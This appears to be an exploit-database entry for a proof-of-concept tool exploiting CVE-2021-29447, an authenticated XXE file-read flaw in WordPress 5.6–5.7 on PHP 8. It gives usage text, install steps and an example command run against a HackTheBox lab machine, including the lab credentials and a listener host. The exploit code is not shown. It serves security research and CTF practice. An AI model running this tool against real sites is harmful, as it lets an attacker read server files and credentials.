POC details: dbf0f754cbfd94c3ef9b1854d249a5b7ae3f5231

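Source
Related vulnerability
Title: WordPress code issue vulnerability (CVE-2021-29447)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress contains a code issue vulnerability; in a successful XXE attack, an attacker can exploit it to access internal files.
Description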
CVE-2021-29447 - Authenticated XXE Injection - WordPress < 5.7.1 & PHP > 8 
Introduction
# CVE-2021-29447

POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection. More about this CVE [here](https://www.sonarsource.com/blog/wordpress-xxe-security-vulnerability/)

## Example

Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress website with Media Library vulnerable to XXE Injection.

```bash
python lfi.py -u manager -p partylikearockstar -t metapress.htb -lh 10.10.XX.XX -lp 8081 -w file_wordlist
```

[![asciicast](https://asciinema.org/a/wqBueScWdUnuG4HzHbYPuOThI.svg)](https://asciinema.org/a/wqBueScWdUnuG4HzHbYPuOThI)

## Usage

```bash
usage: lfi.py [-h] -u USERNAME -p PASSWORD -t TARGET -lh LHOST [-lp LPORT] [-w WORDLIST] [-i] [-v] [-s]
              [filenames ...]

positional arguments:
  filenames             Filenames to fetch

options:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Username to user in authenticated upload
  -p PASSWORD, --password PASSWORD
                        Password to user in authenticated upload
  -t TARGET, --target TARGET
                        Remote host to target, e.g. "metapress.htb"
  -lh LHOST, --host LHOST
                        Hostname on which server is bound (default "")
  -lp LPORT, --port LPORT
                        Listening port (default "8080")
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist of filenames to be fetched
  -i, --interactive     Runs in interactive mode
  -v, --verbose         Enables verbose mode
  -s, --skip            Skip php server spin-up (MAKE SURE IT IS ALREADY RUNNING!)
```

## Installation

**Make sure you have php installed.**

```bash
git clone https://github.com/viardant/CVE-2021-29447
cd CVE-2021-29447
pip install -r requirements.txt
```
File snapshot

```
[4.0K]  /data/pocs/dbf0f754cbfd94c3ef9b1854d249a5b7ae3f5231
├── [ 434]  grab.php
├── [ 11K]  lfi.py
├── [ 34K]  LICENSE
├── [1.7K]  README.md
└── [  18]  requirements.txt

0 directories, 5 files
```